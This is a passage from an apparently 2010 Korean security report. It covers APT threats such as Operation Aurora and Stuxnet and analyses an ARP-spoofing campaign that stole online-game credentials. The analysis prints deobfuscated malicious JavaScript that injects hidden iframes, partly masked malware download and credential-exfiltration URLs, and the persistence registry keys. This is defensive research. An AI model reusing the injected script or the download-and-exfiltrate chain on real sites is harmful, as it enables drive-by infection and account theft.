조직적으로금전적인목적의보안위협을생산하는현상들은그이후에도계속되고있으며이제는그규모면에서경제적으로가치가높은데이터들을탈취하는산업스파이적인형태로발전하게되었다. 이러한형태로발전함에따라일반인들과비교하여보안이견고한기업내부네트워크에침입하기위해생산되는보안위협들역시그정교함이높아짐과동시에그위험성역시더높아지게되었다. 이러한산업스파이적인형태로첨단정보통신기업들을대상으로하였던보안위협의좋은사례로는 2010 년 1월오퍼레이션오로라 (Operation Aurora) 또는구글해킹이라고도불렸던보안사고이다. 해당보안사고는규모가큰첨단정보통신기업들인구글 (Google) 등을대상으로해당기업들이가지고있는소프트웨어의소스코드와같은기업중요데이터를탈취할목적으로이루어졌다. 이과정에서마이크로소프트의인터넷익스플로러 (Internet Explorer) 제로데이 (Zero Day) 취약점이었던 MS10-002 이사회공학기법과함께악용되었으며안티바이러스 (Anti- Virus) 소프트웨어에서도탐지되지않도록하기위해특별히제작된원격제어형태의악성코드도함께발견되었다. 이러한일련의과정들을살펴보면, 첨단정보통신기업들을대상으로공격을수행하였던조직은기업내부의기밀데이터를탈취하기위해별도의특수하게제작된제로데이취약점과악성코드를사용하 5 공격명령생성 Attacker www.mypremierfutbol.com www.todaysfutbol.com C&C 서버 2 감염시스템정보전송 6 공격명령전송 www.mypremierfulbol.com/ index.php?data=66a54e2 7 관리자의 PLC 제어명령생성 8 PLC 제어명령변조 9 Target 공격 10 산업장비감염설비제어장애발생 1 USB 를통한감염 개인 PC WinCC/STEP7 PLC 제어 PC 3 내부네트워크감염 Zero Day Attack 공유폴더, 오토런 MS08-064, 046, 061 4 공격명령 Share RPC 서버통신 내부시스템 [ 그림 8] 스턱스넷악성코드의감염과동작원리 8

였다. 이러한점은기존의금전적인목적을가지고있는조직들과는그기술적인정교함에있어서한차원더높다고것을입증하는것이다. APT 형태의보안위협에대한가장대표적인사례로는올해 7월에발견된스턱스넷 (Stuxnet) 을들수가있다. 스턱스넷의경우해당악성코드의제작목적자체가사회기간산업시설중하나인원자력발전소의 SCADA(Supervisory Control And Data Acquisition) 시스템들을임의로제어하기위해서이다. 그리고해당악성코드를원자력발전소내부폐쇄망에서다른시스템들로유포시키기위해기존에알려진 MS08-067 취약점과함께 4개의새로운제로데이취약점을사용할정도로고도의기술들이사용되었다. 그리고해당악성코드의설계적인측면에서도원자력발전소내부에서사용하는지멘스 (Siemens) 소프트웨어의구조를정확하게파악하여관련파일을변조한다는점들을볼때 APT 보안위협의형태가가지고있는특징들이그대로드러난다고볼수있다. 이러한모습들을보았을때, 결국스턱스넷은장기간에걸친철저한계획과준비를통해조직적으로악성코드에서사용될제로데이취약점개발과지멘스소프트웨어분석그리고악성코드설계라는분업화된형태로진행되었을것으로예측할수가있다. 그리고스턱스넷의유포를위해서사회공학기법을포함한다양한방법들을동원해내부폐쇄망으로옮겨갈수있도록장시간에걸쳐논리적, 물리적보안시스템들을교묘히회피하였을것으로보인다. APT 형태의보안위협에위한대응방안앞서우리는 APT 형태의보안위협들이가지는의미와그것들이가지는고도의정교함과높은위험성들이어떠한형태로사용되었는지를대표적인몇가지사례들을통해살펴볼수가있었다. 그렇다면이러한커다란위험성을가지고있는 APT 형태의보안위협들에대응하기위해어떠한대응수단과전략을갖추어야할것인가하는생각을할수있을것이다. APT 형태의보안위협에대응하기위해서는 [ 그림 9] 와같이크게사고예방차원에서취할수있는방안들과실제위협으로인한보안사고가발생한단 계에서취할수있는방안들로나누어볼수있다. 먼저실제위협발생전단계에서는일반적으로사전예방차원에서의활동들이주를이루고있다. 이러한활동으로는정기적인보안관제로기업내부네트워크에서침해사고로간주할수있는이상징후들이발생하는지주의깊은모니터링이필요하다. 그리고기업내부에서현재사용하고있는보안정책들의실효성에대해검토함과동시에각각의시스템들이보관하고있는데이터들의중요성과기밀성에따른위험성분석을수행하여보안사고가발생하더라도그피해를최소화할수있는방안을수립하는것이중요하다. 앞서살펴본바와같이 APT 형태의보안위협들에서는그목적을달성하기위한하나의수단으로서악성코드가제작되어사용된다고언급한바있다. 그러므로모든시스템과클라이언트에는보안소프트웨어를설치하여운영하도록하며주기적으로운영되고있는보안소프트웨어와보안장비의업데이트및관리를하는것이중요하다. 그리고기업내부네트워크를사용하는임직원들을대상으로정기적인보안인식교육을실시하여사회공학기법을악용하는다양한형태의보안위협들에노출되는것을예방할수있도록한다. 위협발생전의단계가침해사고예방적인관점에서의접근이었다면실제 APT 형태의위협이발생한것을인지하였거나유사한형태의보안사고가발생한것으로간주할경우크게 3가지형태로나누어서접근할필요가있다. 첫번째, 기업내부네트워크의시스템들에악성코드가감염되는것을막도록한다. 이를위해기업내부에서검토하고인증한애플리케이션들을대상으로화이트리스트 (White List) 를작성하여해당애플리케이션들외에임의로다른애플리케이션들을설치하지못하도록보안소프트웨어나시스템보안정책을이용하여설치및실행되지않도록차단한다. 그리고중요시스템들에서는확인되지않거나인가되지않은계정들의접근권한을최소화하거나차단하고네트워크역시중요시스템들이있는네트워크대역과일반임직원들이사용하는네트워크대역을분리및차단하여원천적인접근을차단하는것도방안이다. 위협예방전략수립 보안관제수행위험분석수행보안전략유효성분석 데이터유출예방 중요데이터보호중요데이터유출예방 위협탐지와대응 호스트및네트워크이상징후탐지침해사고대응프로세스수행침해사고포렌식프로세스수행 악성코드유입최소화 보안인식교육수행지속적보안업데이트관리보안소프트웨어설치및운영 위협발생전 위협발생상황 APT 형태보안위협 악성코드감염예방 어플리케이션화이트리스트접근권한의최소화네트워크접근제한및분리신원확인및접근권한관리 [ 그림 9] 스턱스넷악성코드의감염과동작원리 9

두번째, APT 형태의보안위협들이최종적으로시도하는형태는데이터의파괴나탈취라는것을앞서살펴보았다. 그러므로실제위협이발생한것으로파악되는상황이라면기업내부기밀데이터가보관중인시스템과데이터를보호할수있도록데이터암호화와접근통제로유출차단과함께기밀데이터가유출되었더라도그것을악용할수없도록하는것이중요하다. 세번째, 실제보안위협이어떠한경로로기업내부네트워크로침입을하였으며어떠한시스템과데이터에대해접근을시도하고있는지파악하는과정이필요하다. 이러한탐지및대응의단계에는최초네트워크내부의비정상적인패킷의검출과함께비정상적인접근이나데이터전송이발생하는시스템을파악하여침해사고대응프로세스를진행과함께디지털포렌식 (Digital Forensic) 프로세스에따라자세한분석을진행하도록한다. 결론우리는이제까지현재정보보호분야에서발생하고있는조직적으로금전적인이윤을목적으로생산되는보안위협들의특징과형태들을살펴보았다. 이러한보안위협들은이제 APT 라는경제적이거나정치적인더큰목적으로의보안위협들을생산하는단계에이르렀다. 과거에발생하였던사례들과의비교를통해 APT 형태의보안위협들이가지는기술적고도화와정교함은그위험성이더높은것을알수있었다. 이렇게과거에비해현저히높 아진위험성을내포하고있는 APT 형태의보안위협들에대해대응하기위해서는보안소프트웨어나보안장비들에만의존하는단층적인 (One Layer) 방안은그실효성을거두기가어렵다. 그리고이와함께기업내부네트워크에있는시스템과중요데이터가보관되어있는시스템들에매일접근하는임직원들에대한정기적인보안인식교육부재는내부네트워크에언제라도보안위협을유발시킬수있는큰문제점으로작용할수있다. 결국이러한고도화된보안위협들에대응하기위해서는효율적인보안소프트웨어및보안장비사용그리고중요시스템과데이터에대한접근차단등과같은기술적인보안에더해정기적인보안인식교육그리고시스템사용에대한명문화된보안지침등과같은정책적인보안이상호보완해주는구조로정보보호프로세스가확립되어야지만개별적인대응방안들이계층적인구조인다단계적인대응방안 (Defense in Depth) 으로재편성이가능하다. 현재뚜렷하게들어난 APT 형태의보안위협은스턱스넷이대표적이지만현재에도이러한형태의보안위협을계속되고있을것이며향후에는이보다더정교하고고도화된 APT 형태의보안위협들일생산될가능성이높다. 그러므로이러한형태의보안위협에대해충분한이해를바탕으로수립된정보보호프로세스만이실제보안사고가발생하더라도능동적으로대응을할수있을것으로생각된다. 참고문헌 1. Cybercrime industry has automated itself to improve efficiency, scalability, and profitability - Amichai Shulman, CTO of Imperva. (2010) 2. Advanced Persistent Threats (APTs) Damballa. (2010) 3. Advanced Persistent Threat (APT) Eric Cole, CTO of McAfee (2010) 4. Understanding the advanced persistent threat Richard Bejtlich, Director of Incident Response for General Electric. (2010) 5. Advanced Persistent Threats M86 Security (2010) 6. Countering cyber attacks Ernst & Young (2010) 7. Protecting Your Critical Assets Lessons Learned from Operation Aurora McAfee (2010) 8. Studying Malicious Websites and the Underground Economy on the Chinese web Jianwei Zhuge, Thorsten Holz, Chengyu Song, Jinpeng Guo, Xinhui Han, and Wei Zou, Peking University Institue of Computer Science and Technology Beijing, China, University of Mannheim Laboratory for Dependable Distributed Systems Mannheim, Germany (2007) 9. Crimeware Understanding New Attacks and Defenses Jakobsson, Ramzan, Symantec Press. (2008) 10. Cyber Fraud Tactics, Techniques, and Procedures Graham, Howard, Thomas, Winterfeld, CRC Press (2009) 11. AhnLab ASEC Threat Research blog (http://blog.ahnlab.com/asec) 12. AhnLab ASEC Report (http://www.ahnlab.com/kr/site/securitycenter/asec/asecreportview.do?groupcode=vni001) 13. IBM X-Force 2010 Mid-Year Trend and Risk Report IBM X-Forece (2010) 10

SPECIAL REPORT 최악의악성코드심층분석및대응방안 2010. 10/ 11 02 악성코드와의끝없는싸움 ARP Spoofing 몇년사이에많은악성코드들이발견되고있다. 그가운데기억에남는악성코드가있다면아마도 2007, 2008 년까지유행했던 'ARP Spoofing 과결합한 Onlinegamehack' 일것이다. 그당시에도침해사이트와응용프로그램 (Internet Explorer, Flash, PDF 등 ) 의취약성을이용한악성코드유포가빈번하게발생했었는데여기에 "ARP Spoofing" 이라는해킹기법이더해지면서악성코드의빠른확산과고객 ( 특히기업 ) 에상당한피해를입혔다. 한동안잠잠했던 'ARP Spoofing 과결합한 Onlinegamehack' 이올해 9 월초부터침해사이트를통해서다시유포중인것이운영중인 Active Honeypot 에서확인되었다. 보안업체들은수집된변종들을엔진에대응하고있으며, 유포 URL 은국가기관및고객사에공유하여피해예방을해왔다. 하지만지금도많은고객 ( 기업 ) 들에서해당악성코드감염으로인한피해가발생하고있는상황이다. 그래서올해다시이슈가되고있는 'ARP Spoofing 과결합한 Onlinegamehack' 의유포기법그리고악성코드의동작방식에대해정리했다. ARP (Address Resolution Protocol) ARP 란각 PC의 IP에대해서물리주소 (Mac 주소 ) 를매핑시키는프로토콜로, 네트워크에서는 IP기반이아닌 IP에매핑된 Mac 주소를기반으로통신한다. 예를들어 192.168.26.134 가 192.168.26.1 과통신을한다고가정했을때 (1) 134 번 IP는통신할 IP가 192.168.26.1 이라는것은알고있음 (2) 하지만실제로는 IP 통신이아닌해당 IP 에매핑되는 Mac 주소로통신을함 (3) 그런데 134 번은 192.168.26.1 의 Mac 주소를모름 (4) 따라서 134 번은 192.168.26.1 의 Mac 주소를찾기위해 Broadcast(FF:FF:FF:FF:FF:FF) 를발생함 (5) 이에대한응답으로 192.168.26.1 의 Mac 주소는 00:50:56:C0:00:08 로 Reply 함위과정을설명한것이바로아래 [ 그림 2] 이다. Source Destination Protocol Info 정상네트워크 CD Vmware_5d:78:43 Broadcast ARP Who has 192.168.26.1? Tell 19.2 168.26.132 Vmare_c0:00:08 Vmware_5d:78:43 ARP 192.168.26.1 is at 00:50:56:c0:00:08 [ 그림 2] 정상네트워크에서의 ARP 패킷 게이트웨이 IP: 192.168.26.128 Mac: 00-0C-29-62-4E-1B IP: 192.168.26.1 Mac: 00-50-56-C0-00-08 ARP Request Broadcast ARP Reply IP: 192.168.26.134 Mac: 00-0C-29-5D-78-43 IP: 192.168.26.2 Mac: 00-50-56-EC-78-2B AB PC A - ARP Table [ 그림 3] 공격자가보낸 ARP Reply 패킷 B 192.168.26.2 00-50-56-EC-78-2B C 192.168.26.128 00-0C-29-62-4E-1B D 192.168.26.1 00-50-56-C0-00-08 [ 그림 1] 정상네트워크의구조 자, 그럼정상네트워크에 ARP Spoofing 이발생했을경우어떻게달 라지는지살펴보자. 11

ARP Spoofing 이발생한네트워크 PC C - ARP Table A C 192.168.26.134 00-50-56-87-13-FC 192.168.26.128 00-50-56-87-13-FC Mac 테이블변조 PC D - ARP Table A C 192.168.26.134 00-50-56-87-13-FC 192.168.26.128 00-50-56-87-13-FC CD D 192.168.26.1 00-50-56-87-13-FC D 192.168.26.1 00-50-56-87-13-FC 게이트웨이 IP: 192.168.26.128 Mac: 00-0C-29-62-4E-1B IP: 192.168.26.1 Mac: 00-50-56-C0-00-08 ARP Reply 공격자는 ARP Reply 를발생시킴 IP: 192.168.26.134 Mac: 00-0C-29-5D-78-43 IP: 192.168.26.2 Mac: 00-50-56-EC-78-2B IP: 192.168.26.130 Mac: 00-50-56-87-13-FC AB 공격자 PC A - ARP Table PC B - ARP Table B 192.168.26.2 00-50-56-87-13-FC A 192.168.26.134 00-50-56-87-13-FC C 192.168.26.128 00-50-56-87-13-FC C 192.168.26.128 00-50-56-87-13-FC D 192.168.26.1 00-50-56-87-13-FC D 192.168.26.1 00-50-56-87-13-FC Mac 테이블변조 [ 그림 4] ARP Spoofing 이발생한네트워크 ARP (Address Resolution Protocol) Spoofing 각 PC 의 Mac Table 에매핑된모든 IP 에대한 Mac 주소가공격 자 PC 의 Mac 주소로변조되어모든 PC 들의통신이공격자 PC 를통해서이루어지는기법을의미한다. [ 그림 4] 에서처럼 ARP Spoofing 이발생한네트워크라면공격자는 [ 그림 3] 처럼지속적으 로 ARP Reply 를발생하여동일한네트워크에속해있는다른 PC 들이공격자가보낸 ARP Reply 의정보로자신들의 Mac Table 의 Cache 를업데이트하도록한다. 공격이성공하면각 PC 의 Mac Table 의캐시 (Cache) 는공격자 PC 의 Mac 주소로업데이트되며 이로인해모든트래픽은공격자 PC 를통해서통신하려는각 PC 로 Relay 된다. 결국공격자는자신의 PC 를통과하는모든트래픽 에대해서스니핑 (Sniffing) 이가능하게된다. http://www.xxx.com http://www.xxx.co.kr http://www.xxx.net http://www.xxx.org http://www.xxx.net http://www.xxx.jp... Sites detected by Active Honeypot 4 Yahoo.js 3 5 1 6 Attacker www.***web.com(cn)w ww.***.me (CN) 98.***.***.164 (US) ad.htm (MS10-018) news.html (MS10-002) count.html s.exe 8 7 2 9 smx4pnp.dll 10 ma.exe Onlinegamehack xcvaver(%d).dll... ahnzxc.exe anszxc(%d).dll... nvsvc.exe WanPacket.dll Packet.dll wpcap.dll ARP Spoofing 과결합된 Onlinegamehack [ 그림 5] 를참고하여 ARP Spoofing 과결합된 Onlinegamehack 에대해서알아보자. 1. 공격자는불특정웹사이트를대상으로웹공격 (SQL Injection, XSS 등 ) 을수행하여취약한사이트의웹페이지에 yahoo.js 링크삽입 2. 악성코드배포를위한숙주사이트 3 개구축및운영 3. 취약한사이트는웹페이지에삽입된 yahoo.js 에의해서악성코드숙 주사이트와링크 4. 로컬 PC 가취약한 Internet Explorer 를사용하여 yahoo.js 가삽입된사 이트에접속 5. 취약한 Internet Explorer 에의해서접속한사이트에삽입되었던 yahoo.js 링크가실행되면서로컬 PC 에 yahoo.js 가다운로드 & 실행 6. 실행된 yahoo.js 에의해서로컬 PC 에는추가로 ad.htm, news.html, count.html 이다운로드 & 실행 7. ad.htm, news.html 은 Internet Explorer 의취약성을이용하여 s.exe 다 운로드 & 실행하는 Exploit 8. 로컬 PC 에다운로드된 s.exe 가실행되면 smx4pnp.dll 을생성한후실행 9. 실행된 smx4pnp.dll 에의해서로컬 PC 에는추가로 ma.exe, tt.exe 가 다운로드 & 실행 10. ma.exe 는특정온라인게임사용자의계정정보를탈취하는 Onlinegamehack 악성코드 11. tt.exe 는 ARP Spoofing 기능을가진악성코드 [ 그림 6] 은최근한달간 Active Honeypot 에서탐지된정보를근 거로 ARP Spoofing 과결합된 Onlinegamehack 의유포에대해서 타임라인을작성한것이다 [ 그림 5] ARP Spoofing 과결합된 Onlinegamehack 의전체구조 tt.exe 11 12

탐지시간유형삽입된 Script URL Download URL 침해사이트 2010/08/26 10:46:32 Downloader Onlinegamehack www.***yuan.com www.***518.com 202.***.***.16 www.maki***.com 외 15 개 2010/08/29 11:13:46 2010/09/01 23:43:23 Downloader Onlinegamehack Downloader Onlinegamehack ARP Spoofing www.***yuan.com www.***yuan.com www.***ny.com 202.***.***.16 www.***ny.com 202.***.***.16 www.defa***.com 외 16 개 2010/09/05 16:09:54 2010/09/07 12:49:26 Downloader Onlinegamehack ARP Spoofing Downloader Onlinegamehack ARP Spoofing www.***yuan.com www.***ge.com www.***wl.com 202.***.***.16 www.***wl.com 98.***.***.154 www.kc***.co.kr 외 9 개 2010/09/11 19:37:40 Downloader Onlinegamehack ARP Spoofing www.***ge.com www.***3.me 98.***.***.154 2010/09/13 14:23:59 Downloader Onlinegamehack ARP Spoofing www.***web.com www.***3.me 98.***.***.154 www.ih***.com 외 8 개 2010/09/14 02:33:58 Downloader Onlinegamehack ARP Spoofing www.***web.com www.***3.me 98.***.***.155 2010/09/15 15:52:13 Downloader Onlinegamehack ARP Spoofing www.***csmap.org www.***168.com 98.***.***.156 www.ib***.co.kr 외 6 개 2010/09/19 10:37:54 Downloader Onlinegamehack ARP Spoofing www.***ame.com www.yang***-etdz.com 98.***.***.155 98.***.***.156 www.ea***.co.kr 외 6 개 [ 그림 6] ARP Spoofing 과결합된 Onlinegamehack 의유포탐지타임라인 [ 그림 6] 에보이는타임라인이전에도다운로더 (Downloader) 만의 유포시도는꾸준히있어왔는데그것은 ARP Spoofing 과결합된 악성코드를유포하기위한테스트정도로파악됐다. 그러나 2010 년 9 월 1 일부터는본격적으로 ARP Spoofing 과결합된악성코드 가침해사이트를통해서유포되기시작했다. 특히수시로삽입 된 Script URL 과 Download URL 의도메인을변경해왔음을알수 가있었다. 악성스크립트 (yahoo.js) 분석 [ 그림 7] 에서보는것처럼 ARP Spoofing 과결합된 Onlinegamehack 감염의시발점이되는 yahoo.js 는침해사이트의 특정페이지에 script src 태그와함께링크형식으로삽입되어있었 으며아래그림처럼난독화된자바스크립트이다. html + = '<param name="swliveconnect" value="true">'; html + = '<embed src="'+src+'"quality=high bgcolor="#ffffff"... html + = '</object>'; document.write(html) }/*SOS*/{document.write('<script src=http://www....jes/yahoo. js><script>');} [ 그림 7] 침해사이트의특정페이지에삽입된 yahoo.js [ 그림 8] 에서보는것처럼 yahoo.js 는 2 단계의난독화된코드로 되어있으며난독화를해독한후의최종스크립트코드는아래 [ 표 1] 과같다. window.onerror=function(){return true;} var Za16da="16a16a"; if(document.cookie.indexof('hello')==-1){ var Za16da="16a16a"; var expires=new Date(); var Za16da="16a16a"; expires.settime(expires.gettime()+24*60*60*1000); var Za16da="16a16a"; document.cookie='hello=yes;path=/;expires='+expires. togmtstring(); var Za16da="16a16a"; document.title=document.title.replace(/\<(\ w \W)*\>/,""); var Za16da="16a16a"; document.write("<iframe src=http://www.[ 일부제거 ] web.com/images/ad.htm width=0 height=0></iframe><iframe src=http://www.[ 일부제거 ]web.com/images/news.html width=0 height=0></iframe>"); var Za16da="16a16a"; document.writeln("<iframe src=http:\/\/www.[ 일부제거 ] web.com\/images\/count.html width=0 height=0><\/iframe>"); var Za16da="16a16a"; } [ 표 1] 난독화해독후 yahoo.js 코드 난독화된 ad.htm (MS10-018) www.****.me/images/s.exe 난독화된 news.html (MS10-002) [ 그림 8] 난독화된 yahoo.js [ 그림 9] 난독화된 ad.htm 과 news.html 13

[ 표 1] 을보면 yahoo.js 는총 3개의스크립트를추가로다운로드하는데해당스크립트들의역할은 [ 그림 9] 와같다. [ 그림 9] 에서보는것처럼난독화된 ad.htm 과 news.html 은각각 MS10-018, 악성코드숙주사이트 98.***.***.154 (US) MS10-002 취약점을사용하며해당스크립트들이실행되면특정사이트로부터 s.exe 를다운로드및실행한다. MS10-018 취약점을 복호화루틴 s.txt 다운로드 ma.exe, tt.exe 다운로드 이용하는 ad.htm 의 ShellCode 를분석해보면아래복호화루틴에의해서암호화되어있던일부코드를복호화하는데, 위에서언급 복호화 악성코드다운로드 한것처럼특정사이트로부터 s.exe 를다운로드및실행하기위한코드가존재함을알수가있었다. 암호화된 smx4pnp.dll 파일생성 %USERPROFILE%\Microsoft\smx4pnp.dll s.exe 의파일구조 레지스트리등록 [ 그림 10] ShellCode 의복호화루틴 HKCU\Software\Microsoft\Windwos\CurrentVersion\Run smx4pnp = rundll32.exe %USERPROFILE%\Microsoft\smx4pnp.dll, Launch 암호화된 ShellCode 복호화된 ShellCode [ 그림 13] s.exe 의동작구조 [ 그림 11] 암호화, 복호화된 ShellCode 다운로드된 s.exe 는다운로드기능을가진 DLL 을특정경로에생성하는드롭퍼 (Dropper) 이다. s.exe 에대한상세분석은추후언급하기로한다. ad.htm 과 news.html 파일이이용하는취약점에대한상세정보는아래주소를참고한다. MS10-002: http://www.microsoft.com/korea/technet/security/bulletin/ms10-002.mspx MS10-018: http://www.microsoft.com/korea/technet/security/bulletin/ms10-018.mspx 위두취약점을대체하는 MS 보안공지 MS10-035: http://www.microsoft.com/korea/technet/security/bulletin/ms10-035.mspx [ 그림 14] s.exe 의복호화루틴 %USERPROFILE%\Microsoft\smx4pnp.dll 은 CreateThread() 를사 용하여악성코드다운로드기능을실행한다. count.html http://s15.****.com/stat.php?id=2304639&web_id=2304639 [ 그림 12] count.html 의기능 count.html 의역할은감염 PC 의현황을파악하기위한스크립트 코드로보여진다. [ 그림 15] CreateThread() : 파일다운로드기능 s.exe 분석 s.exe 는 Onlinegamehack 과 ARP Spoofing 기능을가진악성코드를다운로드하는 DLL 을특정폴더에생성하는드롭퍼 (Dropper) 이며, 전체적인동작구조는 [ 그림 13] 과같다. s.exe 의변종은다수존재하고파일크기는 15kb ~ 50kb 로다양하다. 그리고일부변종에서는 [ 그림 13] 에서보는것처럼생성할 smx4pnp.dll 을암호화된형태로가지고있으며복호화루틴을실행하여 MZ-PE 구조를갖춘 DLL 로복호화한다. [ 그림 16] 파일다운로드 [ 그림 16] 을보면 "http://%u. %u. %u. %u:81/s.txt" 에서 %u는 gethostbyname() 를사용하여 URL 에대한 IP로설정되며해당 URL 에서 s.txt 를다운로드한다. s.txt 는 Onlinegamehack 과 ARP Spoofing 기능을가진악성코드를다운로드하기위한 URL 리스트가저장된텍스트파일이다. 14

Domain Full URL Country Detection Time 비고 ku****.in http://202.***.***.16:**/s.txt http://202.***.***.16:**/ma.exe http://202.***.***.16:**/tt.exe CN 2010/09/03 12:18:43 98.***.***.154 로 변경됨 http://98.***.***.154:**/s.txt http://98.***.***.154:**/ma.exe http://98.***.***.154:**/tt.exe US 2010/09/07 12:49:26 http://98.***.***.155:**/s.txt http://98.***.***.155:**/ma.exe http://98.***.***.155:**/tt.exe US 2010/09/10 11:49:26 ****.net.in http://98.***.***.156:**/s.txt http://98.***.***.156:**/ma.exe http://98.***.***.156:**/tt.exe US 2010/09/15 15:52:13 ****.nt.in http://98.***.***.156:**/s.txt http://98.***.***.156:**/ma.exe http://98.***.***.156:**/tt.exe US 2010/09/19 10:37:54 ****.net.in 98.***.***.155 로 변경됨 [그림 17] 악성코드 유포 URL의 타임라인 [그림 17]은 smx4pnp.dll이 s.txt, ma.exe, tt.exe를 다운로드할 때 DLL을 분석해 보면 탈취한 계정정보를 전송하는데 사용되는 URL 사용했던 URL들에 대한 타임라인을 정리한 것으로 도메인은 수 은 암호화된 상태이며 아래 복호화 루틴에 의해서 복호화된다. 시로 변경됨을 알 수가 있고 현재까지 악성코드를 유포 중인 IP대 역은 98.126.*6.***, 98.126.*0.*** 등이며 해당 대역의 IP정보를 조 ma.exe 회해 보면 미국에 할당된 IP대역인 것으로 확인된다. 그리고 해당 도메인들에 대한 whois를 조회해 본 결과 모두 최근에 생성된 것 으로 판단된다. HKCU\Software\Microsoft\Windwos\CurrentVersion\Run anhxox = %SYSTEM%ahnzxc.exe ahnzxc.exe 복사본 *****story.exe li**.bin, ai**.bin... 유출대상 게임과 사이트 특정 온라인 게임 계정 정보 유출 anszxc%d.dll 특정 사이트로 전송 유출된 계정정보 수집 사이트 특정 온라인 게임 계정 정보 유출 anszxc%d.dll BHO 파일생성 *****story.exe li**.bin, ai**.bin... IEHlprObj.IEHlprObj 1 =... [그림 18] WHOIS Query Result [그림 21] ma.exe의 동작구조 [그림 22] URL 복호화 루틴 [그림 19] DNS Query Result [그림 23] 암호화된 URL 복호화 전과 후 [그림 20] 악성코드 유포에 사용 중인 추가 IP ma.exe(onlinegamehack) 분석 ma.exe는 특정 온라인 게임 사용자의 계정정보를 탈취할 목적을 가진 악성코드로 동작구조는 [그림 21]과 같다. ma.exe가 실행된 후 생성한 2개의 DLL은 [그림 21]에서 보는 것처럼 특정 게임 또 는 게임 사이트 로그인 시 사용되는 사용자의 계정정보를 탈취 하여 특정 URL로 전송하는데 [그림 21]의 파일생성에서 첫 번째 [그림 24] 테스트 시 계정정보 유출패킷 15 유출대상 게임과 사이트

파일명 URL IP 유출대상유출여부비고도메인정보 anszxc10.dll anszxc20.dll http://k****.co.in:8080/wow/lin.asp 98.***.***.92 (US) wo***.exe http://k****.co.in:8080/dnfa/lin.asp dn***.exe No http://k****.co.in:8080/dnfpa/lin.asp pco***.exe No http://k****.co.in:8080/mx/lin.asp *****story.exe No http://k****.co.in:8080/ta/lin.asp http://k****.co.in:8080/hx/lin.asp http://k****.co.in:8080/yh/lin.asp http://k****.co.in:8080/pm/lin.asp http://k****.co.in:8080/lin/lin.asp ****ol.exe ****in.bin play****.co.kr ****on.play****.jp ****on.bin www.****ang.com play****.co.kr ****game.com id.****game.com No No No No Yes ( 테스트확인 ) Yes ( 테스트확인 ) 코드분석으로확인 df.****.on.com ( 증상재현안됨 ) ***.on.play.****.jp ( 접속불가 ) Domain Name:k****.CO.IN Created On:13-Sep-2010 17:27:13 UTC Expiration Date:13-Sep-2011 17:27:13 UTC Registrant ID:TS_11029084 Registrant Name:liu xiaowei Registrant Organizationjiuxiaowei Registrant Street:1:!huang helu 28 Hao Registrant City:zhe jiang Registrant State/Province:jiaxing Registrant Postal Code: 314000 Registrant Country:CN Registrant Phone: +86.13800138000 Registrant FAX: +86.13800138000 Registrant Emai:****ing886@gmail.com [ 그림 25] Onlinegamehack 의계정정보유출현황 파일생성 tt.exe [ 그림 21] 에서 ma.exe 가실행되면두개의 DLL 을생성함을알수 있었으며, [ 그림 25] 에서는해당두 DLL 들이다수의온라인게임 을대상으로사용자의계정정보유출시도함을알수가있다. nvsvc.com Packet.dll HKCU\Software\Microsoft\Windwos\CurrentVersion\Run nvsvc= %SYSTEM%\nvsvc.exe CreateThread() Call Thread 1 감염 PC 의네트워크대역으로 ARP Request Broadcast 감염 PC 의 ARP Table Static 설정 tt.exe(arp Spoofing) 분석 [ 그림 27] 을보면정상 PC의 ARP Table 에설정된 G/W( 게이트웨이 ) 의 Mac 주소가악성코드에감염된 PC의 Mac 주소로변경되어있음을알수가있다. 이렇게되면 4번 IP에서 In/Out 되는모든패킷이악성코드에감염된 PC를통해서 Relay 되므로스니핑 (Sniffing) 이가능해진다. WanPacket.dll Thread 2 감염 PC 의네트워크대역으로 ARP Reply 패킷전송 정상파일 wpcap.dll npf.sys 패킷전달 Packet Relay 스크립트삽입 <script src=http://www.****map.org/images/yahoo.js></script> [ 그림 29] 재조립되어 4 번 IP 에 Relay 된패킷일부 [ 그림 26] tt.exe 의동작구조 악성코드에감염된 PC 의 IP 정보 Physical Address............ : 00-0C-29-87-17-FC Dhcp Enabled............ : No IP Address............ : 10.10.100.3 Subnet Mask............ : 255.255.255.0 Default Gateway............ : 10.10.100.1 DNS Servers............ : 8.8.8.8 > 악성코드에감염된 PC의 ARP Table Internet Address Physical Address Type 10.10.100.1 00-0f-cb-fd-5c-9b static G/W 의정상 IP/Mac 주소 10.10.100.2 00-23-54-87-43-80 static 10.10.100.4 00-0c-29-f6-d4-13 static 10.10.100.5 00-0c-29-77-1b-9c static [ 그림 30] 재조립된패킷에삽입된악성스크립트링크 [ 그림 31] yahoo.js 가특정사이트에추가로다운로드하는파일들 > 정상 PC의변조된 ARP Table Internet Address Physical Address Type G/W 의변조된 IP/Mac 주소 10.10.100.1 00-0f-cb-fd-5c-9b dynamic 10.10.100.2 00-23-54-87-43-80 dynamic 10.10.100.3 00-0c-29-87-13-fc dynamic 악성코드에감염된 IP/Mac 주소 10.10.100.5 00-0c-29-77-1b-9c dynamic [ 그림 27] ARP Table 비교 [ 그림 32] 악성코드에감염된 PC에서발생한 ARP Request Broadcase 이번이슈를정리하는동안개인보다는기업에서피해사례가더많았다는것과 PC가집단네트워크를이루고있는환경을대상으로했다는것을알수가있었다. 이악성코드가 IE 보안취약점을이용한만큼보안업데이트에좀더신경썼다면 PC와네트워크모두안전했을것이다. [ 그림 28] 악성코드에감염된 PC 에서발생한 ARP Reply 16

